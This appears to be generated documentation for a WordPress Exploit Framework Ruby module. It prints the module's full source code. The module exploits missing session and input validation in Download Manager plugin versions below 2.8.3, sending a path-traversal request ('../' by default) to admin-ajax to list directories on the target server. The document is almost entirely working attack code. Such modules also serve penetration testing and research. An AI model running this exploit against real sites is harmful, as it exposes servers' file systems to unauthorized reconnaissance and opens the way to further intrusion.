class Wpxf::Auxiliary::DownloadManagerDirectoryListingDisclosure
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb, line 10 def initialize super update_info( name: 'Download Manager Directory Listing Disclosure', desc: %( This module uses a lack of session and input validation in versions < 2.8.3 of the Download Manager plugin to get the directory listing of the specified directory. ), author: [ 'James Golovich', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8365'], ['URL', 'http://www.pritect.net/blog/wordpress-download-manager-2-8-8-critical-security-vulnerabilities'] ], date: 'Jan 19 2016' ) register_options([ StringOption.new( name: 'remote_path', desc: 'The relative or absolute path to view the contents of', required: true, default: '../' ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb, line 41 def check check_plugin_version_from_readme('download-manager', '2.8.3') end
encoded_remote_path()
click to toggle source
# File lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb, line 53 def encoded_remote_path url_encode(remote_path) end
remote_path()
click to toggle source
# File lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb, line 45 def remote_path if datastore['remote_path'].end_with? '/' datastore['remote_path'] else "#{datastore['remote_path']}/" end end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb, line 57 def run return false unless super listing = [{ name: 'Name', type: 'Type' }] emit_info 'Requesting directory listing...' res = execute_post_request( url: wordpress_url_admin_ajax, params: { 'action' => 'wpdm_init', 'task' => 'wpdm_dir_tree' }, body: { 'dir' => encoded_remote_path } ) if res.nil? emit_error 'No response from the target' return false end if res.code != 200 emit_error "Server responded with code #{res.code}" return false end emit_info 'Parsing response...' begin doc = Nokogiri::HTML(res.body) items = doc.xpath("//ul//li") items.each do |item| if item['class'] =~ /directory/ listing.push(name: item.at('a').text, type: 'Directory') else listing.push(name: item.at('a').text, type: 'File') end end rescue StandardError => e emit_error "Could not parse the response: #{e}" return false end emit_table listing true end